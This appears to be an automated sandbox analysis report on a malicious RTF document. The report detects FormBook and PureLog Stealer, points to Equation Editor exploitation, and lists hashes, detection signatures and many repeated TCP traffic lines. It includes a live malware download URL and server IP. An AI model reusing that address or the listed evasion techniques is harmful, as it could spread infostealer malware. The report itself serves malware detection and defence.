Windows Analysis Report
DzokrPQPdy.rtf

Overview

General Information

Sample name: DzokrPQPdy.rtf
renamed because original name is a hash value
Original sample name: 0a9c028203a8416be8db7371550d0fb5.rtf
Analysis ID: 1483003
MD5: 0a9c028203a8416be8db7371550d0fb5
SHA1: 2f576cdfbf4f60918676f6583265c504bdeefa21
SHA256: a424c4312f97747efa22a627aa0c77c4f11022d171e11d3eeff00dd77b737520
Tags: rtf
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: DzokrPQPdy.rtf Avira: detected
Antivirus detection for URL or domain
Source: http://104.219.239.104/80/winiti.exe Avira URL Cloud: Label: malware
Yara detected FormBook
Source: Yara match File source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\winiti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe Joe Sandbox ML: detected

Exploits
barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 104.219.239.104 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe Jump to behavior
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
